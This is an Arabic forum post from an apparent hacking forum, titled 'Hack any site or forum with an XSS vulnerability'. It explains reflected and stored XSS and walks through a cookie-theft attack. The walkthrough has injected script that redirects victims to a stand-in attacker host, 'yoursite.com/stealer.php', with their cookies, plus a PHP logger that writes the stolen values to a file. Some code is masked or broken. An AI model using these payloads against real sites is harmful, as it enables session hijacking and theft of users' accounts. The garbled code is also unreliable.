اخترق اي موقع او منتدى مع ثغرة ( xss )

Saad Ghamdi · 08-02-2013, 07:34 PM

بسم الله الرحمن الرحيم

اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...

ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره

ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :

javascript

HTML

PHP

اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص

كود PHP:

  www.infectedsite.com/search.php?q=word

يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :

http://www.infectedsite.com/search.php?q=***************("XSS")</script>word

ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )

لماذا يكون الموقع مصابا بثغرة ( xss )

السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :

كود PHP:

   #@$%^,.<>

وذلك لمنع إدخال الأكواد التالية :

javascript

HTML

PHP

هناك نوعين من ثغرات (xss )

( 1 ) اول نوع وهو النوع الدائم :

يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :

كود PHP:

   ***************("XSS")</script>

سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

( 2 ) النوع المؤقت :

يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :

كود PHP:

  http://www.infectedsite.com/search.php?q=***************("XSS")</script>word

كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :

كود PHP:

   stealer.php

تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :

كود:

<?php
 $data=$_GET["c"]
 $f=open("*******.tct","w")
 $f.write($data)
 $f.close()
 ?>

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :

كود PHP:

  http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script>

هنا دمجنا السكريبت :

كود PHP:

   ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script>

هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :

كود:

******** . ******

هنا اذا فتحنا الملف

كود:

http://yoursite.com/*******.txt

ستجد الككيز للمستخدم مكتوبة فيها

اما في الثغرات الدائمة فيكفي ادخال الكود التالي :

كود PHP:

   ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script>

وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :

كود PHP:

   ********.location

هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية

جبروت هكر ,Cyber Mafia ,aircrack -ng و 2 آخرون معجبون بهذا

المصدر: :: vBspiders Professional Network ::

hojvr hd l,ru h, lkj]n lu eyvm ( xss )

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

اخترق اي موقع او منتدى مع ثغرة ( xss )

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات